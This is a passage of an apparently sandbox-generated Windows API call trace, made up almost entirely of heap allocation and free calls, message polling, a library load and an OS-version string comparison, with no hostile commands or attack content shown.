0xd [0265.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.398] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.399] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.400] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0265.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0265.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.401] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0265.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.402] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.402] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.402] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0265.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0265.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0265.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0265.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.403] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.404] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0265.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0265.405] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.405] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.406] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.406] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.407] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.408] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.409] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.411] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.411] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.411] 